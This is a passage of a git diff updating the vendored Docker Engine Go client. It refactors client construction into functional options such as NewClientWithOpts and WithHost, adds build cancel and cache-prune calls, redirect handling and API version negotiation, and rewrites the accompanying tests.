BuildCancel requests the daemon to cancel ongoing build request +func (cli *Client) BuildCancel(ctx context.Context, id string) error { + query := url.Values{} + query.Set("id", id) + + serverResp, err := cli.post(ctx, "/build/cancel", query, nil, nil) + if err != nil { + return err + } + defer ensureReaderClosed(serverResp) + + return nil +} diff --git a/vendor/github.com/docker/docker/client/build_prune.go b/vendor/github.com/docker/docker/client/build_prune.go new file mode 100644 index 0000000000..c4772a04e7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/build_prune.go @@ -0,0 +1,30 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" +) + +// BuildCachePrune requests the daemon to delete unused cache data +func (cli *Client) BuildCachePrune(ctx context.Context) (*types.BuildCachePruneReport, error) { + if err := cli.NewVersionError("1.31", "build prune"); err != nil { + return nil, err + } + + report := types.BuildCachePruneReport{} + + serverResp, err := cli.post(ctx, "/build/prune", nil, nil, nil) + if err != nil { + return nil, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return nil, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return &report, nil +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go index 0effe498be..921024fe4f 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_create.go +++ b/vendor/github.com/docker/docker/client/checkpoint_create.go @@ -1,8 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // CheckpointCreate creates a checkpoint from the given container with the given name diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go index 96e5187618..5703c21904 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_create_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestCheckpointCreateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go index e6e75588b1..54f55fa76e 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_delete.go +++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // CheckpointDelete deletes the checkpoint with the given name from the given container diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go index a78b050487..117630d61a 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestCheckpointDeleteError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go index 8eb720a6b2..2b73fb553f 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_list.go +++ b/vendor/github.com/docker/docker/client/checkpoint_list.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) -// CheckpointList returns the volumes configured in the docker host. +// CheckpointList returns the checkpoints of the given container in the docker host func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) { var checkpoints []types.Checkpoint @@ -19,7 +19,7 @@ func (cli *Client) CheckpointList(ctx context.Context, container string, options resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil) if err != nil { - return checkpoints, err + return checkpoints, wrapResponseError(err, resp, "container", container) } err = json.NewDecoder(resp.body).Decode(&checkpoints) diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go index 6c90f61e8c..d5cfcda0e5 100644 --- a/vendor/github.com/docker/docker/client/checkpoint_list_test.go +++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestCheckpointListError(t *testing.T) { @@ -55,3 +55,14 @@ func TestCheckpointList(t *testing.T) { t.Fatalf("expected 1 checkpoint, got %v", checkpoints) } } + +func TestCheckpointListContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.CheckpointList(context.Background(), "unknown", types.CheckpointListOptions{}) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go index a9bdab6bb6..b874b3b522 100644 --- a/vendor/github.com/docker/docker/client/client.go +++ b/vendor/github.com/docker/docker/client/client.go @@ -1,10 +1,6 @@ /* Package client is a Go client for the Docker Engine API. -The "docker" command uses this package to communicate with the daemon. It can also -be used by your own Go applications to do anything the command-line interface does -– running containers, pulling images, managing swarms, etc. - For more information about the Engine API, see the documentation: https://docs.docker.com/engine/reference/api/ @@ -43,22 +39,29 @@ For example, to list running containers (the equivalent of "docker ps"): } */ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "fmt" + "net" "net/http" "net/url" "os" + "path" "path/filepath" "strings" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" ) -// DefaultVersion is the version of the current stable API -const DefaultVersion string = "1.25" +// ErrRedirect is the error returned by checkRedirect when the request is non-GET. +var ErrRedirect = errors.New("unexpected redirect in response") // Client is the API client that performs all operations // against a docker server. @@ -83,13 +86,39 @@ type Client struct { manualOverride bool } +// CheckRedirect specifies the policy for dealing with redirect responses: +// If the request is non-GET return `ErrRedirect`. Otherwise use the last response. +// +// Go 1.8 changes behavior for HTTP redirects (specifically 301, 307, and 308) in the client . +// The Docker client (and by extension docker API client) can be made to to send a request +// like POST /containers//start where what would normally be in the name section of the URL is empty. +// This triggers an HTTP 301 from the daemon. +// In go 1.8 this 301 will be converted to a GET request, and ends up getting a 404 from the daemon. +// This behavior change manifests in the client in that before the 301 was not followed and +// the client did not generate an error, but now results in a message like Error response from daemon: page not found. +func CheckRedirect(req *http.Request, via []*http.Request) error { + if via[0].Method == http.MethodGet { + return http.ErrUseLastResponse + } + return ErrRedirect +} + // NewEnvClient initializes a new API client based on environment variables. -// Use DOCKER_HOST to set the url to the docker server. -// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. -// Use DOCKER_CERT_PATH to load the tls certificates from. -// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. +// See FromEnv for a list of support environment variables. +// +// Deprecated: use NewClientWithOpts(FromEnv) func NewEnvClient() (*Client, error) { - var client *http.Client + return NewClientWithOpts(FromEnv) +} + +// FromEnv configures the client with values from environment variables. +// +// Supported environment variables: +// DOCKER_HOST to set the url to the docker server. +// DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. +// DOCKER_CERT_PATH to load the TLS certificates from. +// DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. +func FromEnv(c *Client) error { if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" { options := tlsconfig.Options{ CAFile: filepath.Join(dockerCertPath, "ca.pem"), @@ -99,93 +128,178 @@ func NewEnvClient() (*Client, error) { } tlsc, err := tlsconfig.Client(options) if err != nil { - return nil, err + return err } - client = &http.Client{ - Transport: &http.Transport{ - TLSClientConfig: tlsc, - }, + c.client = &http.Client{ + Transport: &http.Transport{TLSClientConfig: tlsc}, + CheckRedirect: CheckRedirect, } } - host := os.Getenv("DOCKER_HOST") - if host == "" { - host = DefaultDockerHost + if host := os.Getenv("DOCKER_HOST"); host != "" { + if err := WithHost(host)(c); err != nil { + return err + } } - version := os.Getenv("DOCKER_API_VERSION") - if version == "" { - version = DefaultVersion + + if version := os.Getenv("DOCKER_API_VERSION"); version != "" { + c.version = version + c.manualOverride = true } + return nil +} - cli, err := NewClient(host, version, client, nil) - if err != nil { - return cli, err +// WithTLSClientConfig applies a tls config to the client transport. +func WithTLSClientConfig(cacertPath, certPath, keyPath string) func(*Client) error { + return func(c *Client) error { + opts := tlsconfig.Options{ + CAFile: cacertPath, + CertFile: certPath, + KeyFile: keyPath, + ExclusiveRootPools: true, + } + config, err := tlsconfig.Client(opts) + if err != nil { + return errors.Wrap(err, "failed to create tls config") + } + if transport, ok := c.client.Transport.(*http.Transport); ok { + transport.TLSClientConfig = config + return nil + } + return errors.Errorf("cannot apply tls config to transport: %T", c.client.Transport) } - if os.Getenv("DOCKER_API_VERSION") != "" { - cli.manualOverride = true +} + +// WithDialer applies the dialer.DialContext to the client transport. This can be +// used to set the Timeout and KeepAlive settings of the client. +func WithDialer(dialer *net.Dialer) func(*Client) error { + return func(c *Client) error { + if transport, ok := c.client.Transport.(*http.Transport); ok { + transport.DialContext = dialer.DialContext + return nil + } + return errors.Errorf("cannot apply dialer to transport: %T", c.client.Transport) } - return cli, nil } -// NewClient initializes a new API client for the given host and API version. -// It uses the given http client as transport. +// WithVersion overrides the client version with the specified one +func WithVersion(version string) func(*Client) error { + return func(c *Client) error { + c.version = version + return nil + } +} + +// WithHost overrides the client host with the specified one. +func WithHost(host string) func(*Client) error { + return func(c *Client) error { + hostURL, err := ParseHostURL(host) + if err != nil { + return err + } + c.host = host + c.proto = hostURL.Scheme + c.addr = hostURL.Host + c.basePath = hostURL.Path + if transport, ok := c.client.Transport.(*http.Transport); ok { + return sockets.ConfigureTransport(transport, c.proto, c.addr) + } + return errors.Errorf("cannot apply host to transport: %T", c.client.Transport) + } +} + +// WithHTTPClient overrides the client http client with the specified one +func WithHTTPClient(client *http.Client) func(*Client) error { + return func(c *Client) error { + if client != nil { + c.client = client + } + return nil + } +} + +// WithHTTPHeaders overrides the client default http headers +func WithHTTPHeaders(headers map[string]string) func(*Client) error { + return func(c *Client) error { + c.customHTTPHeaders = headers + return nil + } +} + +// NewClientWithOpts initializes a new API client with default values. It takes functors +// to modify values when creating it, like `NewClientWithOpts(WithVersion(…))` // It also initializes the custom http headers to add to each request. // // It won't send any version information if the version number is empty. It is // highly recommended that you set a version or your client may break if the // server is upgraded. -func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { - proto, addr, basePath, err := ParseHost(host) +func NewClientWithOpts(ops ...func(*Client) error) (*Client, error) { + client, err := defaultHTTPClient(DefaultDockerHost) if err != nil { return nil, err } + c := &Client{ + host: DefaultDockerHost, + version: api.DefaultVersion, + scheme: "http", + client: client, + proto: defaultProto, + addr: defaultAddr, + } - if client != nil { - if _, ok := client.Transport.(*http.Transport); !ok { - return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport) - } - } else { - transport := new(http.Transport) - sockets.ConfigureTransport(transport, proto, addr) - client = &http.Client{ - Transport: transport, + for _, op := range ops { + if err := op(c); err != nil { + return nil, err } } - scheme := "http" - tlsConfig := resolveTLSConfig(client.Transport) + if _, ok := c.client.Transport.(http.RoundTripper); !ok { + return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", c.client.Transport) + } + tlsConfig := resolveTLSConfig(c.client.Transport) if tlsConfig != nil { // TODO(stevvooe): This isn't really the right way to write clients in Go. // `NewClient` should probably only take an `*http.Client` and work from there. // Unfortunately, the model of having a host-ish/url-thingy as the connection // string has us confusing protocol and transport layers. We continue doing // this to avoid breaking existing clients but this should be addressed. - scheme = "https" - } - - return &Client{ - scheme: scheme, - host: host, - proto: proto, - addr: addr, - basePath: basePath, - client: client, - version: version, - customHTTPHeaders: httpHeaders, + c.scheme = "https" + } + + return c, nil +} + +func defaultHTTPClient(host string) (*http.Client, error) { + url, err := ParseHostURL(host) + if err != nil { + return nil, err + } + transport := new(http.Transport) + sockets.ConfigureTransport(transport, url.Scheme, url.Host) + return &http.Client{ + Transport: transport, + CheckRedirect: CheckRedirect, }, nil } -// Close ensures that transport.Client is closed -// especially needed while using NewClient with *http.Client = nil -// for example -// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"}) -func (cli *Client) Close() error { +// NewClient initializes a new API client for the given host and API version. +// It uses the given http client as transport. +// It also initializes the custom http headers to add to each request. +// +// It won't send any version information if the version number is empty. It is +// highly recommended that you set a version or your client may break if the +// server is upgraded. +// Deprecated: use NewClientWithOpts +func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { + return NewClientWithOpts(WithHost(host), WithVersion(version), WithHTTPClient(client), WithHTTPHeaders(httpHeaders)) +} +// Close the transport used by the client +func (cli *Client) Close() error { if t, ok := cli.client.Transport.(*http.Transport); ok { t.CloseIdleConnections() } - return nil } @@ -195,41 +309,64 @@ func (cli *Client) getAPIPath(p string, query url.Values) string { var apiPath string if cli.version != "" { v := strings.TrimPrefix(cli.version, "v") - apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p) + apiPath = path.Join(cli.basePath, "/v"+v, p) } else { - apiPath = fmt.Sprintf("%s%s", cli.basePath, p) + apiPath = path.Join(cli.basePath, p) } - - u := &url.URL{ - Path: apiPath, - } - if len(query) > 0 { - u.RawQuery = query.Encode() - } - return u.String() + return (&url.URL{Path: apiPath, RawQuery: query.Encode()}).String() } -// ClientVersion returns the version string associated with this -// instance of the Client. Note that this value can be changed -// via the DOCKER_API_VERSION env var. +// ClientVersion returns the API version used by this client. func (cli *Client) ClientVersion() string { return cli.version } -// UpdateClientVersion updates the version string associated with this -// instance of the Client. -func (cli *Client) UpdateClientVersion(v string) { - if !cli.manualOverride { - cli.version = v +// NegotiateAPIVersion queries the API and updates the version to match the +// API version. Any errors are silently ignored. +func (cli *Client) NegotiateAPIVersion(ctx context.Context) { + ping, _ := cli.Ping(ctx) + cli.NegotiateAPIVersionPing(ping) +} + +// NegotiateAPIVersionPing updates the client version to match the Ping.APIVersion +// if the ping version is less than the default version. +func (cli *Client) NegotiateAPIVersionPing(p types.Ping) { + if cli.manualOverride { + return } + // try the latest version before versioning headers existed + if p.APIVersion == "" { + p.APIVersion = "1.24" + } + + // if the client is not initialized with a version, start with the latest supported version + if cli.version == "" { + cli.version = api.DefaultVersion + } + + // if server version is lower than the client version, downgrade + if versions.LessThan(p.APIVersion, cli.version) { + cli.version = p.APIVersion + } } -// ParseHost verifies that the given host strings is valid. -func ParseHost(host string) (string, string, string, error) { +// DaemonHost returns the host address used by the client +func (cli *Client) DaemonHost() string { + return cli.host +} + +// HTTPClient returns a copy of the HTTP client bound to the server +func (cli *Client) HTTPClient() *http.Client { + return &*cli.client +} + +// ParseHostURL parses a url string, validates the string is a host url, and +// returns the parsed URL +func ParseHostURL(host string) (*url.URL, error) { protoAddrParts := strings.SplitN(host, "://", 2) if len(protoAddrParts) == 1 { - return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host) + return nil, fmt.Errorf("unable to parse docker host `%s`", host) } var basePath string @@ -237,10 +374,29 @@ func ParseHost(host string) (string, string, string, error) { if proto == "tcp" { parsed, err := url.Parse("tcp://" + addr) if err != nil { - return "", "", "", err + return nil, err } addr = parsed.Host basePath = parsed.Path } - return proto, addr, basePath, nil + return &url.URL{ + Scheme: proto, + Host: addr, + Path: basePath, + }, nil +} + +// CustomHTTPHeaders returns the custom http headers stored by the client. +func (cli *Client) CustomHTTPHeaders() map[string]string { + m := make(map[string]string) + for k, v := range cli.customHTTPHeaders { + m[k] = v + } + return m +} + +// SetCustomHTTPHeaders that will be set on every HTTP request made by the client. +// Deprecated: use WithHTTPHeaders when creating the client. +func (cli *Client) SetCustomHTTPHeaders(headers map[string]string) { + cli.customHTTPHeaders = headers } diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go index 0ab935d536..390a1eed7d 100644 --- a/vendor/github.com/docker/docker/client/client_mock_test.go +++ b/vendor/github.com/docker/docker/client/client_mock_test.go @@ -1,4 +1,4 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" @@ -9,6 +9,14 @@ import ( "github.com/docker/docker/api/types" ) +// transportFunc allows us to inject a mock transport for testing. We define it +// here so we can detect the tlsconfig and return nil for only this type. +type transportFunc func(*http.Request) (*http.Response, error) + +func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return tf(req) +} + func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client { return &http.Client{ Transport: transportFunc(doer), diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go index ee199c2bec..58bccaa311 100644 --- a/vendor/github.com/docker/docker/client/client_test.go +++ b/vendor/github.com/docker/docker/client/client_test.go @@ -1,145 +1,115 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" - "encoding/json" - "io/ioutil" "net/http" "net/url" "os" "runtime" - "strings" "testing" + "github.com/docker/docker/api" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/env" + "gotest.tools/skip" ) func TestNewEnvClient(t *testing.T) { - if runtime.GOOS == "windows" { - t.Skip("skipping unix only test for windows") - } - cases := []struct { + skip.If(t, runtime.GOOS == "windows") + + testcases := []struct { + doc string envs map[string]string expectedError string expectedVersion string }{ { + doc: "default api version", envs: map[string]string{}, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "invalid cert path", envs: map[string]string{ "DOCKER_CERT_PATH": "invalid/path", }, - expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. Make sure the key is not encrypted", + expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory", }, { + doc: "default api version with cert path", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "default api version with cert path and tls verify", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", "DOCKER_TLS_VERIFY": "1", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "default api version with cert path and host", envs: map[string]string{ "DOCKER_CERT_PATH": "testdata/", "DOCKER_HOST": "https://notaunixsocket", }, - expectedVersion: DefaultVersion, + expectedVersion: api.DefaultVersion, }, { + doc: "invalid docker host", envs: map[string]string{ "DOCKER_HOST": "host", }, expectedError: "unable to parse docker host `host`", }, { + doc: "invalid docker host, with good format", envs: map[string]string{ "DOCKER_HOST": "invalid://url", }, - expectedVersion: DefaultVersion, - }, - { - envs: map[string]string{ - "DOCKER_API_VERSION": "anything", - }, - expectedVersion: "anything", + expectedVersion: api.DefaultVersion, }, { + doc: "override api version", envs: map[string]string{ "DOCKER_API_VERSION": "1.22", }, expectedVersion: "1.22", }, } - for _, c := range cases { - recoverEnvs := setupEnvs(t, c.envs) + + defer env.PatchAll(t, nil)() + for _, c := range testcases { + env.PatchAll(t, c.envs) apiclient, err := NewEnvClient() if c.expectedError != "" { - if err == nil { - t.Errorf("expected an error for %v", c) - } else if err.Error() != c.expectedError { - t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c) - } + assert.Check(t, is.Error(err, c.expectedError), c.doc) } else { - if err != nil { - t.Error(err) - } + assert.Check(t, err, c.doc) version := apiclient.ClientVersion() - if version != c.expectedVersion { - t.Errorf("expected %s, got %s, for %v", c.expectedVersion, version, c) - } + assert.Check(t, is.Equal(c.expectedVersion, version), c.doc) } if c.envs["DOCKER_TLS_VERIFY"] != "" { // pedantic checking that this is handled correctly tr := apiclient.client.Transport.(*http.Transport) - if tr.TLSClientConfig == nil { - t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled") - } - - if tr.TLSClientConfig.InsecureSkipVerify { - t.Errorf("tls verification should be enabled") - } - } - - recoverEnvs(t) - } -} - -func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) { - oldEnvs := map[string]string{} - for key, value := range envs { - oldEnv := os.Getenv(key) - oldEnvs[key] = oldEnv - err := os.Setenv(key, value) - if err != nil { - t.Error(err) - } - } - return func(t *testing.T) { - for key, value := range oldEnvs { - err := os.Setenv(key, value) - if err != nil { - t.Error(err) - } + assert.Assert(t, tr.TLSClientConfig != nil, c.doc) + assert.Check(t, is.Equal(tr.TLSClientConfig.InsecureSkipVerify, false), c.doc) } } } func TestGetAPIPath(t *testing.T) { - cases := []struct { - v string - p string - q url.Values - e string + testcases := []struct { + version string + path string + query url.Values + expected string }{ {"", "/containers/json", nil, "/containers/json"}, {"", "/containers/json", url.Values{}, "/containers/json"}, @@ -153,118 +123,63 @@ func TestGetAPIPath(t *testing.T) { {"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"}, } - for _, cs := range cases { - c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil) - if err != nil { - t.Fatal(err) - } - g := c.getAPIPath(cs.p, cs.q) - if g != cs.e { - t.Fatalf("Expected %s, got %s", cs.e, g) - } - - err = c.Close() - if nil != err { - t.Fatalf("close client failed, error message: %s", err) - } - } -} - -func TestParseHost(t *testing.T) { - cases := []struct { - host string - proto string - addr string - base string - err bool - }{ - {"", "", "", "", true}, - {"foobar", "", "", "", true}, - {"foo://bar", "foo", "bar", "", false}, - {"tcp://localhost:2476", "tcp", "localhost:2476", "", false}, - {"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false}, - } - - for _, cs := range cases { - p, a, b, e := ParseHost(cs.host) - if cs.err && e == nil { - t.Fatalf("expected error, got nil") - } - if !cs.err && e != nil { - t.Fatal(e) - } - if cs.proto != p { - t.Fatalf("expected proto %s, got %s", cs.proto, p) - } - if cs.addr != a { - t.Fatalf("expected addr %s, got %s", cs.addr, a) - } - if cs.base != b { - t.Fatalf("expected base %s, got %s", cs.base, b) - } + for _, testcase := range testcases { + c := Client{version: testcase.version, basePath: "/"} + actual := c.getAPIPath(testcase.path, testcase.query) + assert.Check(t, is.Equal(actual, testcase.expected)) } } -func TestUpdateClientVersion(t *testing.T) { - client := &Client{ - client: newMockClient(func(req *http.Request) (*http.Response, error) { - splitQuery := strings.Split(req.URL.Path, "/") - queryVersion := splitQuery[1] - b, err := json.Marshal(types.Version{ - APIVersion: queryVersion, - }) - if err != nil { - return nil, err - } - return &http.Response{ - StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(b)), - }, nil - }), - } - - cases := []struct { - v string +func TestParseHostURL(t *testing.T) { + testcases := []struct { + host string + expected *url.URL + expectedErr string }{ - {"1.20"}, - {"v1.21"}, - {"1.22"}, - {"v1.22"}, + { + host: "", + expectedErr: "unable to parse docker host", + }, + { + host: "foobar", + expectedErr: "unable to parse docker host", + }, + { + host: "foo://bar", + expected: &url.URL{Scheme: "foo", Host: "bar"}, + }, + { + host: "tcp://localhost:2476", + expected: &url.URL{Scheme: "tcp", Host: "localhost:2476"}, + }, + { + host: "tcp://localhost:2476/path", + expected: &url.URL{Scheme: "tcp", Host: "localhost:2476", Path: "/path"}, + }, } - for _, cs := range cases { - client.UpdateClientVersion(cs.v) - r, err := client.ServerVersion(context.Background()) - if err != nil { - t.Fatal(err) - } - if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") { - t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion) + for _, testcase := range testcases { + actual, err := ParseHostURL(testcase.host) + if testcase.expectedErr != "" { + assert.Check(t, is.ErrorContains(err, testcase.expectedErr)) } + assert.Check(t, is.DeepEqual(testcase.expected, actual)) } } func TestNewEnvClientSetsDefaultVersion(t *testing.T) { - // Unset environment variables - envVarKeys := []string{ - "DOCKER_HOST", - "DOCKER_API_VERSION", - "DOCKER_TLS_VERIFY", - "DOCKER_CERT_PATH", - } - envVarValues := make(map[string]string) - for _, key := range envVarKeys { - envVarValues[key] = os.Getenv(key) - os.Setenv(key, "") - } + defer env.PatchAll(t, map[string]string{ + "DOCKER_HOST": "", + "DOCKER_API_VERSION": "", + "DOCKER_TLS_VERIFY": "", + "DOCKER_CERT_PATH": "", + })() client, err := NewEnvClient() if err != nil { t.Fatal(err) } - if client.version != DefaultVersion { - t.Fatalf("Expected %s, got %s", DefaultVersion, client.version) - } + assert.Check(t, is.Equal(client.version, api.DefaultVersion)) expected := "1.22" os.Setenv("DOCKER_API_VERSION", expected) @@ -272,12 +187,135 @@ func TestNewEnvClientSetsDefaultVersion(t *testing.T) { if err != nil { t.Fatal(err) } - if client.version != expected { - t.Fatalf("Expected %s, got %s", expected, client.version) + assert.Check(t, is.Equal(expected, client.version)) +} + +// TestNegotiateAPIVersionEmpty asserts that client.Client can +// negotiate a compatible APIVersion when omitted +func TestNegotiateAPIVersionEmpty(t *testing.T) { + defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": ""})() + + client, err := NewEnvClient() + assert.NilError(t, err) + + ping := types.Ping{ + APIVersion: "", + OSType: "linux", + Experimental: false, + } + + // set our version to something new + client.version = "1.25" + + // if no version from server, expect the earliest + // version before APIVersion was implemented + expected := "1.24" + + // test downgrade + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) +} + +// TestNegotiateAPIVersion asserts that client.Client can +// negotiate a compatible APIVersion with the server +func TestNegotiateAPIVersion(t *testing.T) { + client, err := NewEnvClient() + assert.NilError(t, err) + + expected := "1.21" + ping := types.Ping{ + APIVersion: expected, + OSType: "linux", + Experimental: false, + } + + // set our version to something new + client.version = "1.22" + + // test downgrade + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) + + // set the client version to something older, and verify that we keep the + // original setting. + expected = "1.20" + client.version = expected + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) + +} + +// TestNegotiateAPIVersionOverride asserts that we honor +// the environment variable DOCKER_API_VERSION when negotiating versions +func TestNegotiateAPVersionOverride(t *testing.T) { + expected := "9.99" + defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": expected})() + + client, err := NewEnvClient() + assert.NilError(t, err) + + ping := types.Ping{ + APIVersion: "1.24", + OSType: "linux", + Experimental: false, + } + + // test that we honored the env var + client.NegotiateAPIVersionPing(ping) + assert.Check(t, is.Equal(expected, client.version)) +} + +type roundTripFunc func(*http.Request) (*http.Response, error) + +func (rtf roundTripFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return rtf(req) +} + +type bytesBufferClose struct { + *bytes.Buffer +} + +func (bbc bytesBufferClose) Close() error { + return nil +} + +func TestClientRedirect(t *testing.T) { + client := &http.Client{ + CheckRedirect: CheckRedirect, + Transport: roundTripFunc(func(req *http.Request) (*http.Response, error) { + if req.URL.String() == "/bla" { + return &http.Response{StatusCode: 404}, nil + } + return &http.Response{ + StatusCode: 301, + Header: map[string][]string{"Location": {"/bla"}}, + Body: bytesBufferClose{bytes.NewBuffer(nil)}, + }, nil + }), + } + + cases := []struct { + httpMethod string + expectedErr *url.Error + statusCode int + }{ + {http.MethodGet, nil, 301}, + {http.MethodPost, &url.Error{Op: "Post", URL: "/bla", Err: ErrRedirect}, 301}, + {http.MethodPut, &url.Error{Op: "Put", URL: "/bla", Err: ErrRedirect}, 301}, + {http.MethodDelete, &url.Error{Op: "Delete", URL: "/bla", Err: ErrRedirect}, 301}, } - // Restore environment variables - for _, key := range envVarKeys { - os.Setenv(key, envVarValues[key]) + for _, tc := range cases { + req, err := http.NewRequest(tc.httpMethod, "/redirectme", nil) + assert.Check(t, err) + resp, err := client.Do(req) + assert.Check(t, is.Equal(tc.statusCode, resp.StatusCode)) + if tc.expectedErr == nil { + assert.Check(t, is.Nil(err)) + } else { + urlError, ok := err.(*url.Error) + assert.Assert(t, ok, "%T is not *url.Error", err) + assert.Check(t, is.Equal(*tc.expectedErr, *urlError)) + } } } diff --git a/vendor/github.com/docker/docker/client/client_unix.go b/vendor/github.com/docker/docker/client/client_unix.go index 89de892c85..3d24470ba3 100644 --- a/vendor/github.com/docker/docker/client/client_unix.go +++ b/vendor/github.com/docker/docker/client/client_unix.go @@ -1,6 +1,9 @@ -// +build linux freebsd solaris openbsd darwin +// +build linux freebsd openbsd darwin -package client +package client // import "github.com/docker/docker/client" // DefaultDockerHost defines os specific default if DOCKER_HOST is unset const DefaultDockerHost = "unix:///var/run/docker.sock" + +const defaultProto = "unix" +const defaultAddr = "/var/run/docker.sock" diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go index 07c0c7a774..c649e54412 100644 --- a/vendor/github.com/docker/docker/client/client_windows.go +++ b/vendor/github.com/docker/docker/client/client_windows.go @@ -1,4 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" // DefaultDockerHost defines os specific default if DOCKER_HOST is unset const DefaultDockerHost = "npipe:////./pipe/docker_engine" + +const defaultProto = "npipe" +const defaultAddr = "//./pipe/docker_engine" diff --git a/vendor/github.com/docker/docker/client/config_create.go b/vendor/github.com/docker/docker/client/config_create.go new file mode 100644 index 0000000000..c8b802ad35 --- /dev/null +++ 